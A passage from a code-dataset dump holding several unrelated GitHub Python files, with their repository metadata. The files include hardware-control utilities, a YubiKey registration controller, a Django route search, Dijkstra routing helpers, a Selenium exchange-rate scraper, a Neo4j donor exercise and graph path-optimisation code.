instance.__class__.mro() #grab the MRO from the instance\n if parentToChild:\n mro.reverse() #need to reverse MRO so iterates up derived class chain\n \n for thisClass in mro: #iterate over classes in method resolution order\n if functionName in thisClass.__dict__: #check to make sure class has function defined in __dict__. This prevents calling a base class's method multiple times.\n thisClass.__dict__[functionName](instance, *args, **kwargs) #call class function on instance with provided arguments\n\n\ndef objectIdentifier(callingObject):\n \"\"\"Returns a human-readable string identifier for a provided object.\n \n callingObject -- the object to be identified\n \n This method figures out the best name to use in identifying an object, taking queues from:\n - its _name_ attribute, if avaliable\n - more to be added as this evolves...\n \n Returns a string that can be used to identify the object to the user.\n \"\"\"\n if hasattr(callingObject, '_name_'): #object has a _name_ attribute\n name = getattr(callingObject, '_name_')\n if name: #name is not False (or None)\n return name #just return the name\n else: #name is False or None\n return callingObject.__class__.__name__ + \" @ \" + hex(id(callingObject)) #_name_ is None or False, return a reinterpretation of the str representation\n else:\n return callingObject.__class__.__name__ + \" @ \" + hex(id(callingObject)) #no _name_ attribute, return a reinterpretation of the object str representation \n \n \ndef notice(callingObject, noticeString):\n \"\"\"Prints a formatted notice in the terminal window that includes the name of the source.\n \n callingObject -- the instance object making the call\n noticeString -- the message to be printed\n \n For now this function just prints to the terminal, but eventually it could publish to a browser-based interface etc...\n \"\"\"\n print(\"[\" + objectIdentifier(callingObject) + \"] \" + str(noticeString)) #print objectRepr: message\n\ndef printToTerminal(text, newLine = True):\n \"\"\"Prints text to the terminal window, with or without a carriage return.\"\"\"\n if newLine == True: #print with carriage return\n print(text)\n else: #print without carriage return\n sys.stdout.write(text)\n sys.stdout.flush()\n\ndef debugNotice(callingObject, channel, noticeString, padding = False, newLine = True):\n \"\"\"If global verbose debug is enabled, this function will print a formatted notice in the terminal window or alternate target.\n \n callingObject -- the instance object making the call\n channel -- a string channel name, which allows filtering debug output if desired (not currently enabled)\n noticeString -- the message to be printed\n padding -- if true, inserts a carraige return to pad the top of the notice\n newLine -- if false, will output without a newline character\n \n Currently assigned channels:\n comm -- messages related to communications. Mostly coming from the interfaces module.\n units -- messages related to dimensionality of numbers\n persistence -- messages related to virtual machine persistence\n \n Returns True if notice was printed (verbose debug is enabled), or False otherwise\n \"\"\"\n if config.verboseDebug() and config.debugChannelEnabled(channel):\n if padding: print(\"\")\n if callingObject == None:\n printToTerminal(str(noticeString), newLine)\n elif type(callingObject) == str:\n printToTerminal(\"[\" + callingObject + \"] \" + noticeString, newLine)\n else:\n printToTerminal(\"[\" + objectIdentifier(callingObject) + \"] \" + str(noticeString), newLine)\n return True\n else:\n return False\n\ndef generatePersistenceManager(inputArgument, namespace = None):\n \"\"\"Generates a persistence manager base on an input argument.\n \n A persistence manager is a utility object that aids in storing persistent data that must be saved after the interpreter shuts\n down. This function will interpret the input argument provided and will return an appropriate\n persistence manager object if possible.\n \n inputArgument -- if a True Bool: a generic persistence file will be used.\n -- if a String: the string will be interpreted as a filename for the persistence file.\n -- if a utilities.persistenceManager object: the object will be used directly.\n \n namespace -- a text string used to specify a namespace for the persistence manager. This allows multiple identical VMs to share\n a common persistence file.\n \"\"\"\n if type(inputArgument) == bool and inputArgument:\n #a True bool was provided as the input argument. Create a new persistence manager that uses a default file.\n persistenceFilename = \"defaultPersistence.vmp\"\n return persistenceManager(persistenceFilename, namespace)\n \n elif type(inputArgument) == str:\n #A string was provided as the persistence manager, so use that string as the filename\n return persistenceManager(inputArgument, namespace)\n \n elif type(inputArgument) == persistenceManager:\n # a persistenceManager object was provided, so use that.\n if namespace:\n inputArgument.namespace = namespace #update the namespace used by the persistence manager\n return inputArgument\n \n else:\n return None\n \nclass persistenceManager(object):\n '''Provides a unified interface to persistence files.\n \n One of the challenges of Gestalt is maintaining state variables that are generated at run-time and should be recalled\n after the Python interpreter is restarted. The classic use-case is maintaining the network address data that is used\n to associate virtual nodes with their physical counterparts. When a networked node is initialized, the user is asked\n to press a physical button to create the association. This causes the node to adopt the randomly generated address\n transmitted as part of the association request. It ends up being a huge pain to need to redo this association every\n time the virtual machine is restarted. A solution to this is to store the node and address information in a\n 'persistence file'. However it is possible to use persistence to store other information. \n \n To keep the concept of persistence as general as possible, the persistence manager simply provides methods to store persistence \n information to a file as a key-value pairs, and to read it back. The only embelishment is that a namespace can be provided, \n which will be pre-pended followed by a dot to all keys. This enables multiple instances of a single virtual machine to \n share a common persistence file.\n '''\n \n def __init__(self, filename = None, namespace = None):\n \"\"\"Initializes the persistence manager.\n \n filename -- the text string filename to be used for storing the persistence dictionary.\n namespace -- an additional pre-pending text string identifier that enables further specificity in key names.\n Note that this namespace string will be pre-pended to all key names: namespace.key\n \"\"\"\n self.filename = filename\n self.namespace = namespace\n \n def __call__(self):\n \"\"\"Returns self if the persistence manager instance is valid.\n \n Note that validity just means a filename has been provided. This enables a call to persistanceManagerInstance()\n to determine if it's possible to store persistence information.\n \"\"\"\n if self.filename: return self #valid filename\n else: return False \n\n def get(self, key):\n \"\"\"Returns a key stored in the persistence file.\n \n key -- the string key of a value ot be retrieved.\n \n returns value\n \"\"\"\n \n persistenceDictionary = self.readPersistenceDictionary() #read in persistence dictionary from file.\n \n if self.namespace: #a namespace is used\n key = self.namespace + '.' + key #prepend namespace\n \n if key in persistenceDictionary:\n return persistenceDictionary[key]\n else:\n debugNotice(self, 'persistence', 'Unable to retrieve persistence key ' + str(key) + 'from persistence file.')\n return None\n\n def __getitem__(self, key):\n \"\"\"Allows access of values with persistenceManager[key] notation.\"\"\"\n return self.get(key)\n\n\n def set(self, key, value):\n \"\"\"Stores a new key-value pair in the persistence file.\n \n key -- the string key of the value to be stored.\n value -- the value to be stored.\n \"\"\"\n \n persistenceDictionary = self.readPersistenceDictionary() #read in persistence dictionary from file.\n \n if self.namespace: #a namespace is used\n key = self.namespace + '.' + key\n \n persistenceDictionary.update({key: value}) #update the dictionary\n self.writePersistenceDictionary(persistenceDictionary) #write back out the dictionary\n\n def __setitem__(self, key, value):\n \"\"\"Allows setting key:value pairs with persistenceManagerInstance[key] = value notation.\"\"\"\n self.set(key, value)\n \n def readPersistenceDictionary(self):\n \"\"\"Reads a string-encoded dictionary from a persistence file and returns it as a dictionary object.\n \n Returns the stored dictionary object.\n \"\"\"\n try: #try to read in a dictionary\n fileObject = open(self.filename, 'rU')\n persistenceDictionary = ast.literal_eval(fileObject.read()) #safely evaluate the dictionary.\n fileObject.close() #close out the dictionary so it is avaliable for other persistenceManager instances.\n return persistenceDictionary\n except IOError as e: #had an IO error, so return an empty dictionary. Maybe the file doesn't exist?\n debugNotice(self, 'persistence', e)\n return {}\n \n def writePersistenceDictionary(self, persistenceDictionary):\n \"\"\"Stores a dictionary file to the persistence file.\n \n persistenceDictionary -- the dictionary object to be stored.\n \"\"\"\n fileObject = open(self.filename, 'w')\n fileObject.write(\"# This pyGestalt persistence file was auto-generated @ \" + str(datetime.datetime.now()) + \"\\n\")\n fileObject.write(\"{\\n\")\n for key in persistenceDictionary:\n value = persistenceDictionary[key]\n if type(value) == str: #need to wrap value in quotes so it gets parsed correctly on read\n formattedValue = '\"'+value + '\"'\n else:\n formattedValue = str(value)\n \n fileObject.write(\"'\" + key + \"'\" + \":\" + formattedValue + \",\\n\")\n fileObject.write(\"}\")\n fileObject.close()\n \n\ndef unsignedIntegerToBytes(integer, numbytes):\n \"\"\"Converts an unsigned integer into a sequence of bytes, LSB first.\n \n integer -- the number to be converted\n numbytes -- the number of bytes to be used in representing the integer\n \"\"\"\n bytes = list(range(numbytes))\n for i in bytes:\n bytes[i] = int(integer%256)\n integer -= integer%256\n integer = int(integer//256)\n \n if integer>0: raise IndexError('Overflow in conversion between uint and byte list.')\n else: return bytes\n \ndef bytesToUnsignedInteger(byteList):\n \"\"\"Converts a little-endian sequence of bytes into an unsigned integer.\"\"\"\n value = 0 #initialize at 0\n for order, byte in enumerate(byteList):\n value += byte*(256**order)\n return value\n\n\ndef signedIntegerToTwosComplement(integer, bitSize):\n \"\"\"Converts a signed integer into an unsigned two's complement representation.\n \n integer -- the number to be converted.\n bitSize -- the length in bits of the two's complement number to be returned.\n \"\"\"\n maxSize = (2**bitSize)/2 - 1\n if abs(integer) > maxSize: #integer cannot be expressed in size\n raise ValueError(\"Cannot convert signed integer to twos complement. Input value of \" + str(integer) + \" exceeds maximum size (+/- \" + str(maxSize)+\").\") \n if integer >= 0: return int(integer) #integer is positive, so nothing needs to be done.\n else:\n allOnes = 2**bitSize - 1 # fills bitSize bits with all ones\n return (allOnes^abs(int(integer))) + 1 #inverts just the bits comprising the original number, and adds one. This is two's complement!\n\ndef twosComplementToSignedInteger(twosComplement, bitSize):\n \"\"\"Converts a twos-complement representation into a signed integer.\n \n twos-complement -- the number to be converted.\n bitSize -- the length in bits of the two's complement input.\n \"\"\"\n \n signBitPosition = bitSize - 1 #sign bit is the most significant bit\n signBit = 2**signBitPosition #a single bit in the MSB position\n if(signBit & twosComplement): #number is negative, need to take two's complement\n allOnes = 2**bitSize - 1 # fills size bytes with all ones\n return -((twosComplement - 1)^allOnes) #subtract one then flip bits, the is the inverse of encoding process.\n else:\n return twosComplement #positive number, no need to do anything.\n \ndef flattenList(inputList):\n \"\"\"Flattens shallow nested lists into a single list.\n \n Note that this will only work for nesting that is one level deep.\n \"\"\"\n outputList = []\n for item in inputList:\n if hasattr(item, '__iter__'): outputList += item\n else: outputList += [item] #catches case that item is not a list, and doesn't need to be flattened.\n return outputList\n\ndef listToString(inputList):\n \"\"\"Converts a list of integers into an ASCII string.\"\"\"\n return ''.join([chr(i) for i in inputList])\n\ndef stringToList(inputString):\n \"\"\"Convert a string into a list of integers.\"\"\"\n return [ord(i) for i in inputString]\n\ndef changeBitInInteger(integer, bitPosition, bitValue):\n \"\"\"Modifies a provided integer by either setting or clearing a specified bit.\n \n integer -- the number in which to modify a bit\n bitPosition -- the position of the bit in the integer, starting with the LSB = 0\n bitValue -- the value to which the bit should be changed, either True or False\n \n returns the modified integer.\n \"\"\"\n shiftedBitValue = 1< 0:\n c.replay = True\n api_key = api[0].api.key\n else:\n c.replay = False\n api_key = generate_api()\n\n # crypt AES key\n crypted = xtea.crypt(self.xtea_key, aes).encode('hex')\n\n # last check : is this AES unique ?\n if Session.query(id_AES).filter(id_AES.aes == crypted).count() != 0:\n redirect_to(action=\"index\", msg=\"Bad AES - Please generate a new one.\")\n\n # create new key object\n key = Key()\n key.private_id = secret_id\n key.public_id = public_id\n key.email = mail\n\n # create new key - AES part\n new_aes = id_AES()\n new_aes.aes = crypted\n Session.add(new_aes)\n Session.commit()\n id_aes = Session.query(id_AES).filter(id_AES.aes == crypted).one().id\n # add ID to key\n key.id_aes = id_aes\n\n # create new key - API part\n if c.replay:\n key.api_key = api[0].api.id\n else:\n api = API()\n api.key = api_key\n Session.add(api)\n Session.commit()\n api_id = Session.query(API).filter(API.key == api_key).one().id\n key.api_key = api_id\n\n Session.add(key)\n Session.commit()\n \n c.api_key = api_key\n \n return render('/addkey/success.html')\n","repo_name":"cjeanneret/yubilons","sub_path":"yubichecker/controllers/addkey.py","file_name":"addkey.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7971441971","text":"from django.http import HttpResponse\nfrom django.http import Http404\nfrom django.template import Context, loader , RequestContext\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\nfrom django import forms\nfrom django.forms import ModelForm\n\nfrom ragendja.auth.decorators import staff_only\nfrom ragendja.template import render_to_response\nfrom gogogo.models import *\nfrom ragendja.dbutils import get_object_or_404\n#from gogogo.views.db import reverse as db_reverse\nfrom django.core.urlresolvers import reverse\nfrom gogogo.models.loaders import ListLoader\n\nimport cgi\nimport logging\n\ndef search(request):\n \"\"\"\n Route searching\n \"\"\"\t\n error = None\n agency = None\n if \"agency\" in request.GET:\n agency_id = request.GET['agency']\n agency = db.Key.from_path(Agency.kind(),agency_id)\n\n if \"keyword\" not in request.GET:\n return render_to_response( \n request,\n 'gogogo/route/search.html'\n ,{ \n 'page_title': _(\"Route searching\"),\n 'result' : [],\n 'error' : _(\"Error! No keyword provided!\")\n })\n \n keyword = request.GET['keyword']\n keyword = keyword.lower()\n\n route_list_loader = ListLoader(Route)\n route_list_loader.load()\n \n route_list = route_list_loader.get_data()\n \n result = []\n \n agency_property = getattr(Route,\"agency\")\n\n for route in route_list:\n if agency:\n key = agency_property.get_value_for_datastore(route)\n if agency != key:\n continue\n \n if route.short_name.lower().find(keyword) != -1:\n result.append(route)\n continue\n \n for name in route.long_name:\n if name.lower().find(keyword)!= -1:\n result.append(route)\n continue\n \n result = [trEntity(createEntity(route),request) for route in result ]\n \n return render_to_response( \n request,\n 'gogogo/route/search.html'\n ,{ \n 'page_title': _(\"Route searching\"),\n 'result' : result,\n 'error' : error\n })\t\t\n\t\n","repo_name":"gogogo/gogogo-hk","sub_path":"gogogo/views/db/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"13727702973","text":"TEXT = \"\\\nNAME\\n\\\n moonsim - a simple moon simulator.\\n\\\n\\n\\\nSYNOPSIS\\n\\\n python3 moonsim [OPTION] []\\n\\\n\\n\\\nDESCRIPTION\\n\\\n This help page documents the options available when envoking\\n\\\n moonsim with the Python interpreter. See the README.md for\\n\\\n more information about the program.\\n\\\n\\n\\\nOPTIONS\\n\\\n --version\\n\\\n Display current version.\\n\\\n\\n\\\n -l, --license\\n\\\n Display the full license.\\n\\\n\\n\\\n -h, --help\\n\\\n Display this help screen.\\n\\\n\\n\\\n -d, --display\\n\\\n Display the simulation parameters including total,\\n\\\n potential and kinetic energy, position, velocity,\\n\\\n total time elapsed, frame rate, etc.\\n\\\n\\n\\\n -p, --perigee\\n\\\n Begin with the moon at perigee. This is the default.\\n\\\n\\n\\\n -a, --apogee\\n\\\n Begin with the moon at apogee.\\n\\\n\\n\\\nARGUMENTS\\n\\\n [ ]\\n\\\n Width and height of the window. The default is 800x800.\\n\\\n\\n\\\nAUTHOR\\n\\\n Written by Mark Walter Ruszczycky.\\n\\\n mwruszczycky@gmail.com\\n\\\n\\n\\\nCOPYRIGHT\\n\\\n Copyright (c) 2015 Mark Walter Ruszczycky.\\n\\\n License: BSD 3-Clause, http://opensource.org/licenses/BSD-3-Clause.\\n\\\n\\n\\\nSEE ALSO\\n\\\n The README.md included with this program provides a detailed\\n\\\n description of its operation and usage.\\n\"\n","repo_name":"MWRuszczycky/SimpleMoonSimulator","sub_path":"moonsim/resources/help_screen.py","file_name":"help_screen.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74927462826","text":"# encoding: utf-8\nfrom collections import defaultdict, deque\n\n\nclass Mapa(object):\n def __init__(self):\n self.pontos = set()\n self.rotas = defaultdict(list)\n self.distancias = {}\n\n def add_ponto(self, valor):\n \"\"\"Adiciona o ponto.\"\"\"\n self.pontos.add(valor)\n\n def add_rota(self, origem, destino, distancia):\n \"\"\"Adiciona a rota de origem, destino e distância\"\"\"\n self.rotas[origem].append(destino)\n self.rotas[destino].append(origem)\n self.distancias[(origem, destino)] = distancia\n\n\ndef dijkstra(mapa, inicio):\n visited = {inicio: 0}\n path = {}\n\n pontos = set(mapa.pontos)\n\n while pontos:\n menor_ponto = None\n for ponto in pontos:\n if ponto in visited:\n if menor_ponto is None:\n menor_ponto = ponto\n elif visited[ponto] < visited[menor_ponto]:\n menor_ponto = ponto\n if menor_ponto is None:\n break\n\n pontos.remove(menor_ponto)\n distancia_atual = visited[menor_ponto]\n\n for rota in mapa.rotas[menor_ponto]:\n try:\n distancia = distancia_atual + mapa.distancias[(menor_ponto,\n rota)]\n except KeyError:\n continue\n if rota not in visited or distancia < visited[rota]:\n visited[rota] = distancia\n path[rota] = menor_ponto\n\n return visited, path\n\n\ndef menor_caminho(mapa, origem, destino):\n \"\"\"Função que retorna o percurso com menor distância entre 2 pontos.\"\"\"\n visitados, caminhos = dijkstra(mapa, origem)\n caminho_completo = deque()\n _destination = caminhos[destino]\n\n while _destination != origem:\n caminho_completo.appendleft(_destination)\n _destination = caminhos[_destination]\n\n caminho_completo.appendleft(origem)\n caminho_completo.append(destino)\n\n return visitados[destino], list(caminho_completo)\n","repo_name":"fchevitarese/routecalc","sub_path":"dry/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33372813380","text":"# 쪼꼬 열등반 등록 기념\n# 1. 환율 가져오기\n# 2. 역프 가져오기\n# 3. 가격범위 a - b 입력받기\n# 4. 소지금액 입력받기\n# 5. 사용비율 입력받기\n# 6. gui로 만들기\n# 입력을 gui로 받음\n# 출력을 엑셀 테이블 형태로 화면출력 / 엑셀저장\nimport time\nimport warnings\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\n#\n# # warning 무시\n# warnings.filterwarnings(action='ignore')\n#\n# currency_url = 'https://www.investing.com/currencies/usd-krw'\n# res = requests.get(currency_url,verify=False,headers={\"User-Agent\": \"Mozilla/5.0\"})\n#\n# print(res)\n# soup = BeautifulSoup(res.text,'html.parser')\n#\n# # 환율 정보\n# usd_krw=soup.select_one('#last_last').get_text()\n#\n#\n# # 역프 가져오기\n# premium_url = 'https://luka7.net/'\n# res = requests.get(premium_url,verify=False,headers={\"User-Agent\": \"Mozilla/5.0\"})\n# soup = BeautifulSoup(res.text,'html.parser')\n# time.sleep(1)\n# usd_krw=soup.select_one('#coinList > div.row.val.BTC > div.usdPrm.minus')\n#\n# print(res.text)\n# print(soup.select('#coinList > div.row.val.BTC'))\n#\n\n# 공통\nPAUSE_TIME = 2\n\n# 셀레니움 로드\noptions = webdriver.ChromeOptions()\n# options.add_argument('headless')\n# options.add_argument('window-size=1920x1080')\n# options.add_argument(\"disable-gpu\")\n\ndriver = webdriver.Chrome(executable_path='./chromedriver',options=options)\n\n# 묵시적 대기시간 설\ndriver.implicitly_wait(time_to_wait=10)\n\n# 환율 정보\nurl = 'https://www.google.com/search?newwindow=1&biw=1200&bih=683&sxsrf=ALeKk00h9FYH2hEYe_YmZj9if6lN7jTuLA%3A1613001970811&ei=8nQkYMbvMMm3mAXcjKrQBQ&q=USD+KRW&oq=USD+KRW&gs_lcp=Cgdnd3Mtd2l6EAMyCggAEMsBEEYQggIyBQgAEMsBMgUIABDLATIFCAAQywEyBQgAEMsBMgUIABDLATIFCAAQywEyBQgAEMsBMgUIABDLATIFCAAQywE6BwgAEEcQsAM6BAgjECc6BAgAEEM6AggAOgcIABAUEIcCOgIILjoJCCMQJxBGEIICUKxBWOtOYJtVaAFwAngAgAG6AYgBswiSAQMwLjeYAQCgAQGqAQdnd3Mtd2l6yAEIwAEB&sclient=gws-wiz&ved=0ahUKEwjGsPfLxODuAhXJG6YKHVyGCloQ4dUDCA0&uact=5'\ndriver.get(url=url)\nWebDriverWait(driver, 10).until(\n expected_conditions.presence_of_all_elements_located( (By.CSS_SELECTOR,'#knowledge-currency__updatable-data-column > div.b1hJbf > div.dDoNo.ikb4Bb.vk_bk.gsrt.gzfeS > span.DFlfde.SwHCTb') )\n)\ntime.sleep(2) # 필\n\nexchangeRate = driver.execute_script(\"return document.querySelector('#knowledge-currency__updatable-data-column > div.b1hJbf > div.dDoNo.ikb4Bb.vk_bk.gsrt.gzfeS > span.DFlfde.SwHCTb').textContent\")\nprint('환율: ',exchangeRate)\n\n# 역프 정보\nurl = 'https://www.luka7.net'\ndriver.get(url=url)\n\n# AJAX 동기화 대기간\n# 일단 동작하는 코드\n# WebDriverWait(driver, 10).until(\n# expected_conditions.presence_of_all_elements_located( (By.CSS_SELECTOR,'#coinList > div.row.val.BTC') )\n# )\n# time.sleep(2) # 필\n\n# WebDriverWait로는 원하는대로 동작하지 않아서 직접적인 형태로 조치\nwhile True:\n WebDriverWait(driver, 10).until(\n expected_conditions.presence_of_all_elements_located( (By.CSS_SELECTOR,'#coinList > div.row.val.BTC') )\n )\n check = driver.execute_script(\"return document.querySelector('#coinList > div.row.val.BTC > div.usdPrm').textContent\")\n\n if check != '':\n break\n else:\n time.sleep(1)\n\npremium = driver.execute_script(\"return document.querySelector('#coinList > div.row.val.BTC > div.usdPrm').textContent\")\npos_s, pos_e = premium.find('('), premium.find('%')\npremium_rate = premium[pos_s+1:pos_e] # 대상 샘플 : -1,034,710.00 (-2.09%)\nprint('프리미엄: ',premium)\nprint('프리미엄 비율: ',premium_rate)\n\n\n# 3. 가격범위 a - b 입력받기\nprice_a = input()\nprice_b = input()\n\nprint('price range :',price_a,' ~ ',price_b)\n\n\n\n\n\ndriver.close()","repo_name":"lavientor/upbitPriceCalculation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73457057707","text":"import pickle\nfrom torch_geometric.data import HeteroData\nfrom torch_geometric.loader import NeighborLoader\nimport torch_geometric.transforms as T\nimport torch\nimport numpy as np\n\ndef load_binary(path):\n with open(f'{path}', 'rb') as rb:\n data = pickle.load(rb)\n return data\n\ndef createMetaPathBasedAdj(m1, m2):\n adj = np.matmul(m1, m2)\n adj[adj > 1] = 1\n return adj\n\nname_list = ['kato']\n\n# author行列\nA = load_binary('../data/kato/author/author_1.Matrix').toarray()\n# venue行列\nV = load_binary('../data/kato/conference/conference_1.Matrix').toarray()\n# keyword行列\nK = load_binary('../data/kato/term/term_1.Matrix').toarray()\n# year行列\nY = load_binary('../data/kato/year/year_1.Matrix').toarray()\n\nPAP = createMetaPathBasedAdj(A, A.T)\nAPA = createMetaPathBasedAdj(A.T, A)\n\ndata = HeteroData()\ndata['author'] = torch.tensor(A)\ndata['venue'] = torch.tensor(V)\ndata['keyword'] = torch.tensor(K)\ndata['year'] = torch.tensor(Y)\n\nprint(data)\n","repo_name":"Last-Vega/heteroGATE","sub_path":"src/input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2793173077","text":"import datetime\nimport time\n\"\"\"\nRSS Conference constants\n\"\"\"\n\nADMIN = \"rss2017admin\"\nCONFERENCE = \"roboticsfoundation.org/RSS/2017/RCW_Workshop\"\nCOCHAIRS = CONFERENCE+\"/Program_Co-Chairs\"\n# the two tracks within the conference\nPOSTER = CONFERENCE+\"/-_Poster\"\nPROCEEDINGS = CONFERENCE+\"/-_Proceedings\"\nPOSTER_REVIEWERS = POSTER+\"/Reviewers\"\nPROCEEDINGS_REVIEWERS = PROCEEDINGS+\"/Reviewers\"\n# Due date June 18, 2017 at 7:59am here\nDATE_DUE = datetime.datetime(2017, 6, 18, 7, 59)\nTIMESTAMP_DUE = int(time.mktime(DATE_DUE.timetuple()))*1000\n# June 27, 2017, 11:59:59pm Anywhere on Earth time (UTC -12).\n# == June 28, 2017, 7:59am EST\nREVIEW_DUE = datetime.datetime(2017, 6, 28, 7, 59)\nREVIEW_DUE = int(time.mktime(REVIEW_DUE.timetuple()))*1000\n\n","repo_name":"openreview/openreview-scripts","sub_path":"venues/roboticsfoundation.org/RSS/2017/RCW_Workshop/python/rssdata.py","file_name":"rssdata.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"23593590008","text":"#!/usr/bin/env python3\n\n# -------------------------------------------------#\n# Title: neo4j_donor.py\n# Dev: Scott Luse\n# Date: 06/02/2018\n# Comments: need to add delete record; more investigation\n# required to use the cyph MATCH for a specific persons\n# donation records\n# -------------------------------------------------#\n\nimport login_database\nimport utilities\n\nlog = utilities.configure_logger('default', '../logs/neo4j_donor.log')\n\n\ndef donor_create_update(gift_amount, donor_name):\n \"\"\"\n neo4j add donor record\n \"\"\"\n log.info(\"Login to database\")\n driver = login_database.login_neo4j_cloud()\n with driver.session() as session:\n log.info('Add Donation record')\n cyph = \"CREATE (n:Donation {name:'%s', gift: '%s'})\" % (\n gift_amount, donor_name)\n session.run(cyph)\n\n log.info(\"Show all donations for: \" + donor_name)\n cyph = \"\"\"MATCH (p:Donation)\n RETURN p.name as name, p.gift as gift\n \"\"\"\n result = session.run(cyph)\n print(\"Donations in database for: \" + donor_name)\n for record in result:\n print(record['name'], record['gift'])\n\ndef donor_screen_report():\n \"\"\"\n neo4j screen reporting\n \"\"\"\n log.info(\"Login to database\")\n driver = login_database.login_neo4j_cloud()\n with driver.session() as session:\n log.info(\"Show all donations\")\n cyph = \"\"\"MATCH (p:Donation)\n RETURN p.name as name, p.gift as gift\n \"\"\"\n result = session.run(cyph)\n print(\"All donation database records:\")\n for record in result:\n print(record['name'], record['gift'])\n\ndef donor_detach_delete():\n \"\"\"\n neo4j detach_delete\n \"\"\"\n log.info(\"Running clear_all\")\n driver = login_database.login_neo4j_cloud()\n with driver.session() as session:\n session.run(\"MATCH (n) DETACH DELETE n\")\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/ScottL/lesson08/src/neo4j_donor.py","file_name":"neo4j_donor.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42575793057","text":"import numpy as np\nimport networkx as nx\nfrom numpy import linalg as LA\nfrom numpy.linalg import matrix_power\nimport copy\nimport matplotlib.pyplot as plt\nfrom utils_.dijkstra import find_all_paths\n\ndef brute_path_optimization(A : np.array):\n \"\"\"_summary_\n Brute force path optimization\n Args:\n A (np.array): Adjacency matrix\n\n Returns:\n current_path_avg, current_center\n current_path_avg(float): paths mean value\n current_center : vertex which minimizes the path sum\n \"\"\"\n vertices_num = np.shape(A)[0]\n current_path_avg = np.inf\n current_center = 0\n\n for i in range(vertices_num):\n lengths, paths = find_all_paths(wmat = A, start=i)\n\n if np.mean(lengths) < current_path_avg:\n current_path_avg = np.mean(lengths)\n current_center = i\n\n return current_path_avg, current_center\n\ndef optimize_paths(A : np.array, start_vertex = 0):\n \"\"\"_summary_\n\n Args:\n A (np.array): adjacency matrix\n start_vertex (int, optional): Initial center location. Defaults to 0.\n\n Returns:\n optimal centroid vertex, value of mean paths\n \"\"\"\n \n current_start = start_vertex\n\n while True:\n lengths, paths = find_all_paths(wmat = A, start=current_start)\n\n total_start_length = np.sum(lengths)\n\n adjacent_vertices = np.where(~np.isclose([0], A[current_start]))[0]\n\n adj_lengths_minimum = np.inf\n adj_vertex_minimum = start_vertex\n\n for vertex in adjacent_vertices:\n\n new_lengths = copy.deepcopy(lengths)\n for i in range(len(paths)):\n if vertex in paths[i]:\n new_lengths[i] -= A[current_start][vertex]\n else:\n new_lengths[i] += A[current_start][vertex]\n\n if np.sum(new_lengths) < adj_lengths_minimum:\n adj_lengths_minimum = np.sum(new_lengths)\n adj_vertex_minimum = vertex\n \n if adj_lengths_minimum < total_start_length:\n current_start = adj_vertex_minimum\n else:\n break\n\n return current_start, np.mean(find_all_paths(wmat = A, start=current_start)[0])\n\ndef find_closest_vertex(G : np.array):\n\n centroid = np.mean(G, axis = 0)\n distances = np.sum((G - centroid)**2, axis=1)\n\n return np.argmin(distances)\n\n\ndef _construct_inner_product_matrix_(Delta : np.array):\n \"\"\"_summary_\n\n Args:\n Delta (np.array): dissimiliarity matrix\n\n Returns:\n np.array: Inner product matrix (n \\cross n)\n\n \"\"\"\n n = np.shape(Delta)[0]\n B = np.zeros((n ,n))\n third_term = np.sum(np.square(Delta)) / n**2\n\n for i in range(n):\n second_term = np.sum(np.square(Delta[i, :])) / n\n\n for j in range(n):\n first_term = np.sum(np.square(Delta[:, j])) / n\n\n B[i][j] = Delta[i][j] - first_term - second_term + third_term\n \n B *= -0.5\n\n return B\n\ndef calculate_embedding_matrix(B : np.array, m = 2):\n \"\"\"_summary_\n\n Args:\n B (np.array): inner product matrix\n n (int, optional): Dimension of the embedding space. Defaults to 2.\n\n Returns:\n np.array: Points coordinates matrix (n \\cross m)\n\n \"\"\"\n w, v = LA.eigh(B)\n top_m_eigenval, V = w[-m:], v[:, -m:]\n Lambda = np.diag(top_m_eigenval)\n\n return V @ np.sqrt(Lambda)\n\ndef approximate_2_edge_paths_lengths(A : np.array):\n\n \"\"\"_summary_\n\n Args:\n A (np.array): (n \\cross n) Adjacency matrix\n n (int, optional): paths distance to approximate. Defaults to 2.\n\n \"\"\"\n adj = copy.deepcopy(A)\n non_weighted_A = np.zeros(np.shape(adj))\n non_weighted_A[np.nonzero(adj)] = 1\n\n lengts_approx = adj @ non_weighted_A + non_weighted_A @ adj\n lengts_approx[np.diag_indices_from(adj)] = 0\n\n\n paths_num = matrix_power(non_weighted_A, 2)\n paths_num[np.diag_indices_from(adj)] = 0\n \n for i, j in zip(*np.nonzero(lengts_approx)):\n lengts_approx[i][j] = lengts_approx[i][j] / paths_num[i][j]\n\n for i, j in zip(*np.where(adj == 0)):\n adj[i][j] = lengts_approx[i][j]\n\n return adj\n\ndef approximate_paths_lengths(A : np.array, m : int = 2):\n \"\"\"_summary_\n\n Args:\n A (np.array): _description_\n m (int, optional): Number of 2-edge-length paths approximation, each multiplication approximates paths depth by power of 2. Defaults to 2. \n \"\"\"\n\n approx_matrix = A\n for i in range(m):\n approx_matrix = approximate_2_edge_paths_lengths(approx_matrix)\n \n return approx_matrix\n\ndef calculate_centroid_vertex(A: np.array, m = 2):\n\n A /= 